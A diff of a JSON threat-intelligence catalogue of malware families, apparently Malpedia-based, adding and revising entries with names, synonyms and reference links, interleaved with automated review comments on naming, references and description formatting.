+ "https://www.us-cert.gov/ncas/alerts/TA18-275A",
+ "https://threatrecon.nshc.net/2019/01/23/sectora01-custom-proxy-utility-tool-analysis/",
+ "https://github.com/fboldewin/FastCashMalwareDissected/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "e8a04177-6a91-46a6-9f63-6a9fac4dfa02",
+ "value": "FastCash"
+ },
 {
 "description": "",
 "meta": {
@@ -44,6 +59,32 @@
 "uuid": "80447111-8085-40a4-a052-420926091ac6",
 "value": "AndroRAT"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.anubis",
+ "http://b0n1.blogspot.de/2017/05/tracking-android-bankbot.html",
+ "http://blog.koodous.com/2017/04/decrypting-bankbot-communications.html",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/google-play-apps-drop-anubis-banking-malware-use-motion-based-evasion-tactics/",
+ "https://securityintelligence.com/after-big-takedown-efforts-20-more-bankbot-mobile-malware-apps-make-it-into-google-play/",
+ "https://www.welivesecurity.com/2017/11/21/new-campaigns-spread-banking-malware-google-play/",
+ "http://blog.koodous.com/2017/05/bankbot-on-google-play.html",
+ "https://www.fortinet.com/blog/threat-research/bankbot-the-prequel.html",
+ "https://eybisi.run/Mobile-Malware-Analysis-Tricks-used-in-Anubis/",
+ "https://pentest.blog/n-ways-to-unpack-mobile-malware/",
+ "https://info.phishlabs.com/blog/new-variant-bankbot-banking-trojan-aubis",
+ "https://www.fortinet.com/blog/threat-research/a-look-into-the-new-strain-of-bankbot.html",
+ "https://sysopfb.github.io/malware,/reverse-engineering/2018/08/30/Unpacking-Anubis-APK.html"
+ ],
+ "synonyms": [
+ "BankBot"
+ ],
+ "type": []
+ },
+ "uuid": "85975621-5126-40cb-8083-55cbfa75121b",
+ "value": "Anubis"
+ },
 {
 "description": "",
 "meta": {
@@ -86,23 +127,6 @@
 "uuid": "4038c3bc-b559-45bb-bac1-9665a54dedf9",
 "value": "Bahamut (Android)"
 },
- {
- "description": "",
- "meta": {
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/apk.bankbot",
- "https://securityintelligence.com/after-big-takedown-efforts-20-more-bankbot-mobile-malware-apps-make-it-into-google-play/",
- "https://www.welivesecurity.com/2017/11/21/new-campaigns-spread-banking-malware-google-play/",
- "http://b0n1.blogspot.de/2017/05/tracking-android-bankbot.html",
- "http://blog.koodous.com/2017/04/decrypting-bankbot-communications.html",
- "http://blog.koodous.com/2017/05/bankbot-on-google-play.html"
- ],
- "synonyms": [],
- "type": []
- },
- "uuid": "85975621-5126-40cb-8083-55cbfa75121b",
- "value": "BankBot"
- },
 {
 "description": "",
 "meta": {
@@ -143,13 +167,28 @@
 "uuid": "2c672b27-bc65-48ba-ba3d-6318473e78b6",
 "value": "Catelites"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.chamois",
+ "https://android-developers.googleblog.com/2017/03/detecting-and-eliminating-chamois-fraud.html",
+ "https://www.virusbulletin.com/virusbulletin/2019/01/vb2018-paper-unpacking-packed-unpacker-reversing-android-anti-analysis-native-library/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "2e230ff8-3971-4168-a966-176316cbdbf2",
+ "value": "Chamois"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.charger",
 "http://blog.checkpoint.com/2017/01/24/charger-malware/",
- "http://blog.joesecurity.org/2017/01/deep-analysis-of-android-ransom-charger.html"
+ "http://blog.joesecurity.org/2017/01/deep-analysis-of-android-ransom-charger.html",
+ "https://www.welivesecurity.com/wp-content/uploads/2019/02/ESET_Android_Banking_Malware.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -190,6 +229,34 @@
 "uuid": "c0a48ca3-682d-45bc-805c-e62aecd4c724",
 "value": "Clientor"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.clipper",
+ "https://lukasstefanko.com/2019/02/android-clipper-found-on-google-play.html",
+ "https://www.welivesecurity.com/2019/02/08/first-clipper-malware-google-play/",
+ "https://news.drweb.com/show?lng=en&i=12739"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "ff9b47c6-a5b5-4531-abfc-2e4db3dcdc7e",
+ "value": "Clipper"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.comet_bot",
+ "https://twitter.com/LukasStefanko/status/1102937833071935491"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "151bf399-aa8f-4160-b9b5-8fe222f2a6b1",
+ "value": "CometBot"
+ },
 {
 "description": "",
 "meta": {
@@ -270,6 +337,35 @@
 "uuid": "c9f2b058-6c22-462a-a20a-fca933a597dd",
 "value": "ExoBot"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.exodus",
+ "https://motherboard.vice.com/en_us/article/43z93g/hackers-hid-android-malware-in-google-play-store-exodus-esurv",
+ "https://securitywithoutborders.org/blog/2019/03/29/exodus.html",
+ "https://motherboard.vice.com/en_us/article/eveeq4/prosecutors-investigation-esurv-exodus-malware-on-google-play-store"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "462bc006-b7bd-4e10-afdb-52baf86121e8",
+ "value": "Exodus"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.fakespy",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang/",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/fakespy-android-information-stealing-malware-targets-japanese-and-korean-speaking-users/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "dd821edd-901b-4a5e-b35f-35bb811964ab",
+ "value": "FakeSpy"
+ },
 {
 "description": "",
 "meta": {
@@ -343,6 +439,19 @@
 "uuid": "24a709ef-c2e4-45ca-90b6-dfa184472f49",
 "value": "GlanceLove"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.goldenrat",
+ "https://ti.360.net/blog/articles/apt-c-27-(goldmouse):-suspected-target-attack-against-the-middle-east-with-winrar-exploit-en/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "e111fff8-c73c-4069-b804-2d3732653481",
+ "value": "GoldenRAT"
+ },
 {
 "description": "Cisco Talos identifies GPlayed as a malware written in .NET using the Xamarin environment for mobile applications. It is considered powerful because of its capability to adapt after its deployment. In order to achieve this adaptability, the operator has the capability to remotely load plugins, inject scripts and even compile new .NET code that can be executed. ",
 "meta": {
@@ -357,6 +466,20 @@
 "uuid": "13dc1ec7-aba7-4553-b990-8323405a1d32",
 "value": "GPlayed"
 },
+ {
+ "description": "Group-IB describes Gustuff as a mobile Android Trojan, which includes potential targets of customers in leading international banks, users of cryptocurrency services, popular ecommerce websites and marketplaces. Gustuff has previously never been reported. Gustuff is a new generation of malware complete with fully automated features designed to steal both fiat and crypto currency from user accounts en masse. The Trojan uses the Accessibility Service, intended to assist people with disabilities.\r\nThe analysis of Gustuff sample revealed that the Trojan is equipped with web fakes designed to potentially target users of Android apps of top international banks including Bank of America, Bank of Scotland, J.P.Morgan, Wells Fargo, Capital One, TD Bank, PNC Bank, and crypto services such as Bitcoin Wallet, BitPay, Cryptopay, Coinbase etc. Group-IB specialists discovered that Gustuff could potentially target users of more than 100 banking apps, including 27 in the US, 16 in Poland, 10 in Australia, 9 in Germany, and 8 in India and users of 32 cryptocurrency apps.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.gustuff",
+ "https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html",
+ "https://www.group-ib.com/media/gustuff/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "a5e2b65f-2087-465d-bf14-4acf891d5d0f",
+ "value": "Gustuff"
+ },
 {
 "description": "",
 "meta": {
@@ -475,6 +598,19 @@
 "uuid": "4793a29b-1191-4750-810e-9301a6576fc4",
 "value": "LokiBot"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.luckycat",
+ "https://blog.talosintelligence.com/2019/02/exilerat-shares-c2-with-luckycat.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "1785a4dd-4044-4405-91c2-efb722801867",
+ "value": "LuckyCat"
+ },
 {
 "description": "",
 "meta": {
@@ -574,6 +710,19 @@ "uuid": "3272a8d8-8323-4e98-b6ce-cb40789a3616", "value": "Fake Pornhub" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.premier_rat", + "https://twitter.com/LukasStefanko/status/1084774825619537925" + ], + "synonyms": [], + "type": [] + }, + "uuid": "661471fe-2cb6-4b83-9deb-43225192a849", + "value": "Premier RAT" + }, { "description": "", "meta": { @@ -593,7 +742,7 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.redalert2", "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/red-alert-2-0-android-trojan-spreads-via-third-party-app-stores", - "https://clientsidedetection.com/new_android_trojan_targeting_over_60_banks_and_social_apps.html" + "https://www.threatfabric.com/blogs/new_android_trojan_targeting_over_60_banks_and_social_apps.html" ], "synonyms": [], "type": [] @@ -647,6 +796,19 @@ "uuid": "db3dcfd1-79d2-4c91-898f-5f2463d7c417", "value": "Rootnik" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.sauron_locker", + "https://twitter.com/LukasStefanko/status/1117795290155819008" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a7c058cf-d482-42cf-9ea7-d5554287ea65", + "value": "Sauron Locker" + }, { "description": "", "meta": { @@ -781,6 +943,21 @@ "uuid": "e3e90666-bc19-4741-aca8-1e4cbc2f4c9e", "value": "Switcher" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.talent_rat", + "https://twitter.com/LukasStefanko/status/1118066622512738304" + ], + "synonyms": [ + "Assassin RAT" + ], + "type": [] + }, + "uuid": "46151a0d-aa0a-466c-9fff-c2c3474f572e", + "value": "TalentRAT" + }, { "description": "", "meta": { 
@@ -855,7 +1032,7 @@ "value": "Triada" }, { - "description": "Bitdefender described Triout as a Android spyware, which appears to act as a framework for building extensive surveillance capabilities into seemingly benign applications. Found bundled with a repackaged app, the spyware’s surveillance capabilities involve hiding its presence on the device, recording phone calls, logging incoming text messages, recoding videos, taking pictures and collecting GPS coordinates, then broadcasting all of that to an attacker-controlled C&C (command and control) server.", + "description": "Bitdefender described Triout as a Android spyware, which appears to act as a framework for building extensive surveillance capabilities into seemingly benign applications. Found bundled with a repackaged app, the spyware\u2019s surveillance capabilities involve hiding its presence on the device, recording phone calls, logging incoming text messages, recoding videos, taking pictures and collecting GPS coordinates, then broadcasting all of that to an attacker-controlled C&C (command and control) server.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.triout", @@ -934,6 +1111,20 @@ "uuid": "4cfa42a3-71d9-43e2-bf23-daa79f326387", "value": "Xbot" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.xloader", + "https://blog.trendmicro.com/trendlabs-security-intelligence/xloader-android-spyware-and-banking-trojan-distributed-via-dns-spoofing/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "2ba6a2d9-c1c7-482a-b888-b2871c5c5e25", + "value": "XLoader" + }, { "description": "", "meta": { 
@@ -947,6 +1138,32 @@ "uuid": "a8f167a8-30b9-4953-8eb6-247f0d046d32", "value": "XRat" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.yellyouth", + "https://www.mulliner.org/blog/blosxom.cgi/security/yellyouth_android_malware.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a2dad59d-2355-415c-b4d6-62236d3de4c7", + "value": "YellYouth" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.zen", + "https://security.googleblog.com/2019/01/pha-family-highlights-zen-and-its.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "46d6d102-fc38-46f7-afdc-689cafe13de5", + "value": "Zen" + }, { "description": "", "meta": { @@ -978,6 +1195,36 @@ "uuid": "9fbf97c0-d87a-47b0-a511-0147a58b5202", "value": "Ztorg" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/asp.twoface", + "https://unit42.paloaltonetworks.com/unit42-oilrig-performs-tests-twoface-webshell/", + "https://www.zdnet.com/article/source-code-of-iranian-cyber-espionage-tools-leaked-on-telegram/", + "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1536345486.pdf", + "https://unit42.paloaltonetworks.com/unit42-twoface-webshell-persistent-access-point-lateral-movement/" + ], + "synonyms": [ + "HyperShell" + ], + "type": [] + }, + "uuid": "a98a04e5-1f86-44b8-91ff-dbe1534782ba", + "value": "TwoFace" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/asp.unidentified_001" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d4318f40-a39a-4ce0-8d3c-246d9923d222", + "value": "Unidentified ASP 001 (Webshell)" + }, { "description": "", "meta": { 
@@ -1071,15 +1318,34 @@ "uuid": "8a42a699-1746-498b-a558-e7113bb916c0", "value": "Cpuminer (ELF)" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.cr1ptt0r", + "https://resolverblog.blogspot.com/2019/03/de-cr1pt0r-tool-cr1pt0r-ransomware.html", + "https://www.bleepingcomputer.com/news/security/cr1ptt0r-ransomware-infects-d-link-nas-devices-targets-embedded-systems/", + "https://resolverblog.blogspot.com/2019/02/d-link-dns-320-nas-cr1ptt0r-ransomware.html" + ], + "synonyms": [ + "CriptTor" + ], + "type": [] + }, + "uuid": "196b20ec-c3d1-4136-ab94-a2a6cc150e74", + "value": "Cr1ptT0r" + }, { "description": "This payload has been used to compromise kernel.org back in August of 2011 and has hit cPanel Support which in turn, has infected quite a few cPanel servers. It is a credential stealing payload which steals SSH keys, passwords, and potentially other credentials.\r\n\r\nThis family is part of a wider range of tools which are described in detail in the operation windigo whitepaper by ESET.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.ebury", "https://www.welivesecurity.com/wp-content/uploads/2014/03/operation_windigo.pdf", + "https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/", "https://www.welivesecurity.com/2017/10/30/windigo-ebury-update-2/", "https://www.justice.gov/opa/pr/russian-citizen-pleads-guilty-involvement-global-botnet-conspiracy", - "https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/" + "https://www.welivesecurity.com/wp-content/uploads/2018/12/ESET-The_Dark_Side_of_the_ForSSHe.pdf", + "https://www.welivesecurity.com/2018/12/05/dark-side-of-the-forsshe/" ], "synonyms": [], "type": [] 
@@ -1113,6 +1379,19 @@ "uuid": "79b2b3c0-6119-4511-9c33-2a48532b6a60", "value": "ext4" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.fbot", + "https://securitynews.sonicwall.com/xmlpost/vigilante-malware-removes-cryptominers-from-the-infected-device/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "501e5434-5796-4d63-8539-d99ec48119c2", + "value": "FBot" + }, { "description": "", "meta": { @@ -1165,11 +1444,14 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hideandseek", "https://www.bleepingcomputer.com/news/security/hide-and-seek-becomes-first-iot-botnet-capable-of-surviving-device-reboots/", + "https://threatlabs.avast.com/botnet", + "https://blog.avast.com/hide-n-seek-botnet-continues", "https://labs.bitdefender.com/2018/01/new-hide-n-seek-iot-botnet-using-custom-built-peer-to-peer-communication-spotted-in-the-wild/", "https://blog.netlab.360.com/hns-botnet-recent-activities-en/", "https://www.bleepingcomputer.com/news/security/hns-evolves-from-iot-to-cross-platform-botnet/", "https://labs.bitdefender.com/2018/05/hide-and-seek-iot-botnet-resurfaces-with-new-tricks-persistence/", - "https://www.bleepingcomputer.com/news/security/new-hns-iot-botnet-has-already-amassed-14k-bots/" + "https://www.bleepingcomputer.com/news/security/new-hns-iot-botnet-has-already-amassed-14k-bots/", + "https://www.fortinet.com/blog/threat-research/searching-for-the-reuse-of-mirai-code--hide--n-seek-bot.html" ], "synonyms": [ "HNS" 
@@ -1239,12 +1521,29 @@ "uuid": "f8b91c34-b4f0-4ef2-b9fb-15bd5ec0a66d", "value": "Lady" }, + { + "description": "Masuta takes advantage of the EDB 38722 D-Link exploit.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.masuta", + "https://threatpost.com/satori-author-linked-to-new-mirai-variant-masuta/129640/", + "https://blog.newskysecurity.com/masuta-satori-creators-second-botnet-weaponizes-a-new-router-exploit-2ddc51cc52a7", + "https://www.virusbulletin.com/virusbulletin/2018/12/vb2018-paper-tracking-mirai-variants/#h2-appendix-sample-sha256-hashes" + ], + "synonyms": [ + "PureMasuta" + ], + "type": [] + }, + "uuid": "b9168ff8-01df-4cd0-9f70-fe9e7a11eccd", + "value": "Masuta" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mikey", - "http://www.morphick.com/resources/lab-blog/mikey-linux-keylogger" + "https://securitykitten.github.io/2016/12/14/mikey.html" ], "synonyms": [], "type": [] @@ -1265,7 +1564,8 @@ "https://isc.sans.edu/diary/22786", "https://github.com/jgamblin/Mirai-Source-Code", "http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/", - "https://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/" + "https://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/", + "https://unit42.paloaltonetworks.com/mirai-compiled-for-new-processor-surfaces/" ], "synonyms": [], "type": [] 
@@ -1377,6 +1677,19 @@ "uuid": "2ee05352-3d4a-448b-825d-9d6c10792bf7", "value": "Persirai" }, + { + "description": "Pupy is an open-source, cross-platform RAT and post-exploitation framework mainly written in python. Pupy can be loaded from various loaders, including PE EXE, reflective DLL, Linux ELF, pure python, powershell and APK. Most of the loaders bundle an embedded python runtime, python library modules in source/compiled/native forms as well as a flexible configuration. They bootstrap a python runtime environment mostly in-memory for the later stages of pupy to run in. Pupy can communicate using various transports, migrate into processes, load remote python code, python packages and python C-extensions from memory.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.pupy", + "https://github.com/n1nj4sec/pupy" + ], + "synonyms": [], + "type": [] + }, + "uuid": "92a1288f-cc4d-47ca-8399-25fe5a39cf2d", + "value": "pupy (ELF)" + }, { "description": "", "meta": { @@ -1474,6 +1787,19 @@ "uuid": "7b9a9ea0-04d2-42ef-b72f-9d6476b9e0d0", "value": "Spamtorte" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.speakup", + "https://research.checkpoint.com/speakup-a-new-undetected-backdoor-linux-trojan/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "3ccd3143-c34d-4680-94b9-2cc4fa4f86fa", + "value": "SpeakUp" + }, { "description": "", "meta": { @@ -1500,6 +1826,19 @@ "uuid": "e8c131df-ee3b-41d4-992d-71d3090d2d98", "value": "Stantinko" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.sunless", + "https://www.securityartwork.es/2019/01/09/analisis-de-linux-sunless/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d03fa69b-53a4-4f61-b800-87e4246d2656", + "value": "Sunless" + }, { "description": "", "meta": { 
@@ -1533,16 +1872,18 @@
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.tsunami",
 "http://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/",
 "http://get.cyberx-labs.com/radiation-report",
- "https://www.8ackprotect.com/blog/big_brother_is_attacking_you"
+ "https://www.8ackprotect.com/blog/big_brother_is_attacking_you",
+ "https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/"
 ],
 "synonyms": [
 "Amnesia",
+ "Muhstik",
 "Radiation"
 ],
 "type": []
 },
 "uuid": "21540126-d0bb-42ce-9b93-341fedb94cac",
- "value": "Tsunami"
+ "value": "Tsunami (ELF)"
 },
 {
 "description": "",
@@ -1670,9 +2011,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.xorddos",
- "https://www.cdnetworks.com/resources/whitepapers/sg/Whitepaper23.pdf",
- "https://www.fireeye.com/blog/threat-research/2015/02/anatomy_of_a_brutef.html",
- "https://en.wikipedia.org/wiki/Xor_DDoS"
+ "https://en.wikipedia.org/wiki/Xor_DDoS",
+ "https://bartblaze.blogspot.com/2015/09/notes-on-linuxxorddos.html",
+ "https://www.fireeye.com/blog/threat-research/2015/02/anatomy_of_a_brutef.html"
 ],
 "synonyms": [],
 "type": []
@@ -1695,6 +2036,23 @@
 "uuid": "9218630d-0425-4b18-802c-447a9322990d",
 "value": "Zollard"
 },
+ {
+ "description": "Small downloader composed as a Fast-AutoLoad LISP (FAS) module for AutoCAD.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/fas.acad",
+ "https://github.com/Hopfengetraenk/Fas-Disasm",
+ "https://www.forcepoint.com/blog/security-labs/autocad-malware-computer-aided-theft"
+ ],
+ "synonyms": [
+ "Acad.Bursted",
+ "Duxfas"
+ ],
+ "type": []
+ },
+ "uuid": "fb22d876-c6b5-4634-a468-5857088d605c",
+ "value": "AutoCAD Downloader"
+ },
 {
 "description": "",
 "meta": {
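Review bot: The first hunk renames the entry's `value` from "Tsunami" to "Tsunami (ELF)" while keeping the uuid, so anything that matches on the value string (tags or lookups carrying the old name) silently stops matching. If consumers key on the value rather than the uuid, the old name should survive as a synonym so the rename is backward compatible: add `"Tsunami",` to the synonyms list next to `"Radiation"`. The disambiguation itself is sensible given the separate "Tsunami (OS X)" entry added in a later hunk, which is new and needs no alias.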
@@ -1739,6 +2097,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.adwind", + "https://blogs.seqrite.com/evolution-of-jrat-java-malware/", "https://www.fortinet.com/blog/threat-research/new-jrat-adwind-variant-being-spread-with-package-delivery-scam.html", "http://blog.trendmicro.com/trendlabs-security-intelligence/spam-remote-access-trojan-adwind-jrat", "http://malware-traffic-analysis.net/2017/07/04/index.html", @@ -1759,6 +2118,21 @@ "uuid": "8eb9d4aa-257a-45eb-8c65-95c18500171c", "value": "AdWind" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/jar.banload", + "https://colin.guru/index.php?title=Advanced_Banload_Analysis", + "https://www.welivesecurity.com/wp-content/uploads/2015/05/CPL-Malware-in-Brasil-zx02m.pdf", + "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=TrojanDownloader%3AWin32%2FBanload" + ], + "synonyms": [], + "type": [] + }, + "uuid": "30a61fa9-4bd1-427d-9382-ff7c33bd7043", + "value": "Banload" + }, { "description": "", "meta": { 
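Review bot: The new Banload entry in the second hunk is filed under the malpedia `jar.banload` identifier, but two of its three references (the ESET "CPL Malware in Brasil" paper and the Microsoft encyclopedia page for `TrojanDownloader:Win32/Banload`) describe the Windows variant rather than a Java one. It is worth confirming whether those references belong to this entry or to a separate win32-side Banload entry, so the cluster does not conflate two platforms under one uuid. The empty `"description": ""` gives a reader no way to tell which family this entry covers; a one-line note stating the platform would remove the ambiguity.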
@@ -1775,14 +2149,41 @@ "uuid": "bae3a6c7-9e58-47f2-8749-a194675e1c84", "value": "CrossRAT" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/jar.feimea_rat", + "https://dfir.it/blog/2019/02/26/the-supreme-backdoor-factory/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "3724d5d0-860d-4d1e-92a1-0a7089ca2bb3", + "value": "FEimea RAT" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/jar.javadispcash", + "https://twitter.com/r3c0nst/status/1111254169623674882" + ], + "synonyms": [], + "type": [] + }, + "uuid": "71286008-9794-4dcc-a571-164195390c39", + "value": "JavaDispCash" + }, { "description": "jRAT, also known as Jacksbot, is a RAT with history, written in Java. It has support for macOS, Linux, Windows and various BSD. It also has functionality to participate in DDoS-attacks as well as to perform click fraud. Note that the Adwind family often is mistakenly labeled as jRAT, because of of a red hering reference to jrat.io.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.jrat", + "https://www.intego.com/mac-security-blog/new-multiplatform-backdoor-jacksbot-discovered", "https://blog.trendmicro.com/trendlabs-security-intelligence/jacksbot-has-some-dirty-tricks-up-its-sleeves/", "https://github.com/java-rat", - "https://www.intego.com/mac-security-blog/new-multiplatform-backdoor-jacksbot-discovered" + "https://maskop9.wordpress.com/2019/02/06/analysis-of-jacksbot-backdoor/" ], "synonyms": [ "Jacksbot" 
@@ -1819,6 +2220,19 @@ "uuid": "e7852eb9-9de9-43d3-9f7e-3821f3b2bf41", "value": "Qarallax RAT" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/jar.qealler", + "https://www.zscaler.com/blogs/research/qealler-new-jar-based-information-stealer" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d16a3a1f-e244-4715-a67f-61ba30901efb", + "value": "Qealler" + }, { "description": "QRat, also known as Quaverse RAT, was introduced in May 2015 as undetectable (because of multiple layers of obfuscation). It offers the usual functionality (password dumper, file browser, keylogger, screen shots/streaming, ...), and it comes as a SaaS. For additional historical context, please see jar.qarallax.", "meta": { @@ -1851,12 +2265,29 @@ }, { "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/jar.supremebot", + "https://dfir.it/blog/2019/02/26/the-supreme-backdoor-factory/" + ], + "synonyms": [ + "BlazeBot" + ], + "type": [] + }, + "uuid": "651e37e0-1bf8-4024-ac1e-e7bda42470b0", + "value": "SupremeBot" + }, + { + "description": "AIRBREAK, a JavaScript-based backdoor which retrieves commands from hidden strings in compromised webpages.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.airbreak", "https://www.fireeye.com/blog/threat-research/2018/07/chinese-espionage-group-targets-cambodia-ahead-of-elections.html" ], - "synonyms": [], + "synonyms": [ + "Orz" + ], "type": [] }, "uuid": "fd419da6-5c0d-461e-96ee-64397efac63b", 
@@ -1875,11 +2306,25 @@ "uuid": "fb75a753-24ba-4b58-b7ed-2e39b0c68c65", "value": "Bateleur" }, + { + "description": "\u2022 BELLHOP is\ta JavaScript backdoor interpreted using the native Windows Scripting Host(WSH).\r\nAfter performing some basic host information gathering, the BELLHOP dropper\tdownloads a base64-encoded blob of JavaScript to disk and\tsets\tup persistence in three ways:\r\n\u2022 Creating a Run key in the Registry\r\n\u2022 Creating a RunOnce key in the Registry\r\n\u2022 Creating a persistent named scheduled task\r\n\u2022 BELLHOP communicates using HTTP\tand HTTPS with primarily benign sites such as Google\tDocs and PasteBin.\r\n", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.bellhop", + "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "7ebeb691-b979-4a88-94e1-dade780c6a7f", + "value": "BELLHOP" + }, { "description": "According to the GitHub repo, CACTUSTORCH is a JavaScript and VBScript shellcode launcher. It will spawn a 32 bit version of the binary specified and inject shellcode into it.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.cactustorch", + "https://www.codercto.com/a/46729.html", "https://github.com/mdsecactivebreach/CACTUSTORCH" ], "synonyms": [], 
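Review bot: The BELLHOP description string in the first hunk carries copy-paste artifacts from the source write-up: tab escapes in the middle of words (`is\ta`, `dropper\tdownloads`, `and\tsets\tup`), bullet glyphs (`\u2022`) at the start of sentences, and a trailing `\r\n`. No other description in the visible hunks is formatted this way, so normalizing it would keep the cluster consistent: replace each tab with a single space, drop the bullets and the trailing line break, and fold the three persistence mechanisms (Run key, RunOnce key, named scheduled task) into one sentence. The second hunk's reference addition looks fine.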
@@ -1917,6 +2362,35 @@
 "uuid": "d47ca107-3e03-4c25-88f9-8156426b7f60",
 "value": "CukieGrab"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/js.dnsrat",
+ "https://www.flashpoint-intel.com/blog/fin7-revisited:-inside-astra-panel-and-sqlrat-malware/"
+ ],
+ "synonyms": [
+ "DNSbot"
+ ],
+ "type": []
+ },
